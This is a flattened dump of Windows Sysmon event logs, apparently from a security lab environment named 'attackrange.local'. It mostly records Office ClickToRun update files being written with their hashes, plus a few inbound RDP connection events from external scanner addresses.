Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_Trial-ppd.xrm-msMD5=9997DBDD45EA61D9EC7BB579DC739C68,SHA256=3D0D17651AF20357518E8A38A553DE993E4FA01BEB7C8089781A26BA3BDCF814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_Trial-pl.xrm-msMD5=BD6DC981BB96EE5660A0012D28ED4FE9,SHA256=8EBA2ABC93B240FCB58B92C775C6FF74BE472FE40F54B5D7A535D5E123537943,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_Retail-ul-phn.xrm-msMD5=E9C5910A74677CF16AA0D0A13D5C2570,SHA256=505D7E2780DC443E1CBAA84311C52B639A14A4336D3ECB996D8B66DA65556FCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_Retail-ul-oob.xrm-msMD5=729A285F1C947CA204A8DA4D1C40E82A,SHA256=71BF032E3831B66CD9226307B32C7EF9605820B90340BFB2CBB4DB7452F71B59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_Retail-ppd.xrm-msMD5=74DE5ABD46899D39611FBF7F1E7AB9A5,SHA256=B22ACAC1FF26BFA9E5FA8D6D665BC4EF542EE7C9FBDA4BC0127F31484AB5F8C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_Retail-pl.xrm-msMD5=127DFF81E42F1C4F389D6C43D77FAC1B,SHA256=3412E66BB88658751817089FB7FEC1A138EE7546669AE4437939EEDE0EBC447C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_OEM_Perp-ul-phn.xrm-msMD5=16CC37B92FF371CF631B707502B0B916,SHA256=23095220D87A1E38CEF9D28CBB39CBD41F8F26FA47BB6DB26BD9558939D22D7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_OEM_Perp-ul-oob.xrm-msMD5=21C4F7529977609F61F8A1D9A6A3D9B8,SHA256=BDB6C4A9EBA4157747FC8B18884A98273CCF9C5F9921F9C082C8E4FFAED06F2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_OEM_Perp-ppd.xrm-msMD5=B8C0FB783BECF5309E71D85C606FB614,SHA256=68E47EAAD963B6CA4CCB1EA74C56F2A4D753ADBDD04F2E627E5E85B24E1967AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_OEM_Perp-pl.xrm-msMD5=E8FF1F1BFCFB16A7E3B5225B0B710B20,SHA256=ECCC19877602D89398C0A50BE05BA6AFFD2CCBBAC2585549BDF9076F08A21570,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_Grace-ul-oob.xrm-msMD5=D70618EC84ABFD8A66CBE47D89FD9735,SHA256=9BD71CBBB5B47D542FBB2277BC7389853FB583973CCC08A9DAC67420ECAAA770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_Grace-ppd.xrm-msMD5=7DE37D25B0AE5C889ADB93C683B66DDD,SHA256=8AE95B02CACC6D0E4DD090FF4AAF405D12FB638F7C0A8B905794C1E43D88A787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdXC2RVL_MAKC2R-ul-phn.xrm-msMD5=00FD041CF39176B3A77ED52AF35FE464,SHA256=06F54BA83F399BE0332E54461B28EB31BE63F774B9624EC6D21C05AB75270EC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049732Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:12.873{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49934-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049731Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:15.596{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DD4A3A34ED276271E348727D50F7F9E,SHA256=8A4CC6DACBAE0E9BD767E4C4C591CBCB91F70A523C133D7E303EC678037A35A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049730Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:15.346{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C07D3DD71D7F7D5A7C9715F2F7C9939B,SHA256=FEE63A7948783F312F8AA4AF97EA07936C8E14EFE35FF9727E116D88B957E9DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WORD_WHATSNEW.XMLMD5=272DE202EAAB37D7A367985771DE6FF9,SHA256=C1CFF07E008E4B8FA72A6ACAA6F93F44A7ACDF4942A799BD55E5426C000D4DC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WordNaiveBayesCommandRanker.txtMD5=3FEB57D388DC5C6FEB1F469A8BBA0227,SHA256=DF3352269DBB1DE6C9608D592F6DDBD594EEE144B5DB37935F8ADBCF6FF28E66,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000068561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.463{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52970-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000068560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.077{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-23578-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000068559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.974{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-26307-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000068558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WordCommandSuggestionModel.binMD5=D0F07455A947DFB4733E90F88D861947,SHA256=1501919149D5BAABEBD1DA475DDF7377C37CB9D7E85CE991AFFDEDFAC8BA8B67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WINWORD_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WINWORD_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WINWORD_COL.HXTMD5=1272ABFF2491787EDDC808E0A94F4772,SHA256=85A672D5832D245B5970F77EA4643DF4D34EA7FB55AF0BE9956478683C917851,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WINWORD_COL.HXCMD5=1E96F4C8B4A487B43C87FB3E490D0DBA,SHA256=1734CB5FC09E6E57813FF14CD2EECF37233F042BADD62B6750CE23FDDD0C0751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WINWORD.HXSMD5=01DE1ADE9D3CD4C82B89F1DF40E4E5D5,SHA256=9F513011C520C270A0CC0D56156DC43D4AF151878DB2D81D6CAFF558B3FDE55E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WacLangPackEula.txtMD5=04D4DA8275B54ADA1370AE4A453F3D9E,SHA256=E6C078D58B95F8F3DB34EB6969C521CF9E36F066C6E29944BF2307929472E18E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WacLangPack2019Eula.txtMD5=AC154D8A3B1315E61E5905FC6FCF547D,SHA256=07FB57B9DD876615FED4EFCD8A0F138E69C935E952B87FF2F4115125E06A88AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\VVIEWRES.DLLMD5=CDA2E6C09653EDF169156EC3DF9DF8CE,SHA256=BAA30C863A17B013488B9332E077D46901D30804A1BD59F76BC04AD89CAA25EA,IMPHASH=D6158AA25A9B2A4B3831EEA238928506truetrue 23542300x800000000000000068549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\UmOutlookStrings.dllMD5=D3F75AF7AC9FC6DC78921AF19F8BB802,SHA256=4B3067B31F80E9958116777B5EF84BD7646C62C3F4A654586DD51033B4405F90,IMPHASH=EB741A767A6A80709B865CD0789AABCFtruetrue 23542300x800000000000000068548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\UccApiRes.dllMD5=0DEDA437C396E8DD9FD681555BFAE65F,SHA256=F134D72E62D56A8F6D641705D09BC507D64B7A268F5FDC2544BC32F67A021A16,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\UcAddinRes.dllMD5=4F120936C407D42100B571D102AE5714,SHA256=735EE40CD171AD7000CF150E1BE85622CCB19885655C4AE315A579104FA627F7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeWord.nrrMD5=77FE203476E4C7859116D30F85BE83E6,SHA256=C0DC8CF15C310E784C6CB9873086C86F56893255D178659B3AF4876A833CD0AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMePowerPoint.nrrMD5=F2C54AC6D5BDBFAE24D1CCD81473F383,SHA256=5ADA3D07A12EF4175DBFEA7DD51C3DC258470E85A49F88FCB605BBAC494421A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeOutlookTask.nrrMD5=45D52C30995FAB220D85248C527D9066,SHA256=BED7FBD185DF9C08E28F15C8C1FD36801355C2CA461D048B14CA745E2081FFC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeOutlookMeetingReqSend.nrrMD5=D8CBEE503E2EC2C796F0D69CF5DAC1E7,SHA256=4529E5B0F91CAFE6C1B6F27B4E71E9E946BF8A9481B89207ADC0E702F859B79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeOutlookMeetingReqRead.nrrMD5=BB556C084A750C94F91C27EC1B7C72FA,SHA256=D4AB834600F71CFA77A9AF5327DB06E8A359CB569A0781700243951286747FC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeOutlookMailRead.nrrMD5=6F8BC582B2173FD9D5E07DD2E950883B,SHA256=7C379EF59E75D282A7D138218D10DA15F36CF86E5015BCBC5F82D54D5A3E8649,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeOutlookMail.nrrMD5=57258CA6CF00B0FC8943B98C9D1192FD,SHA256=FE1DA96FC023BEC0057415A82C1935A43E03FD6BEB33E4ACB0C47849F20A5F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeOutlookAppt.nrrMD5=50114726EB1FFC65E1745C9B51C04F8C,SHA256=9C870C6D5AA349C7B772B934DF29A5DB00CACE698ABE04D79D0CA892BC1C8947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeOutlookAddr.nrrMD5=28DE9EA5F3D7D1463E95C2EB27422DC5,SHA256=0979F8B05A59ADD2A8D18A76F009E5944CC8D68C8282FEA3957A655635D28C1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeOutlook.nrrMD5=B9F300753408A7B051A20BBD96D1C120,SHA256=AF52F7054F90E281FA8AAEB8C604DB777329E0651FDEB136CE5F16FFE429B830,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeOneNote.nrrMD5=29BE007CE77696E4B27BA451DD5F11A9,SHA256=BFF7C1D8BEF7EAFF80A5C9D71892CC2FD1B89224F432324D9CF9DC182D5D08EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeExcel.nrrMD5=7117DC382AD157A12A4BBC6FEE71A52F,SHA256=4E572CD1C342E446F6CD14326B59CC0B0FCB733AA502C37D611C13B43D8AE44D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TellMeAccess.nrrMD5=97428A22BE500B7CBADB4B1DB7073B88,SHA256=36B9A6DC961DE4123C6369934E353D6B36CD135276977367BBDFA3AB2B6484EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\TelemetryLog.xltxMD5=4F0C3E9C2A18C50D02F7747A38A826C5,SHA256=1C6E87BB81D9541DE425DE974A3C12BBB58D903BDD26303A30088E3EA2EA6740,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 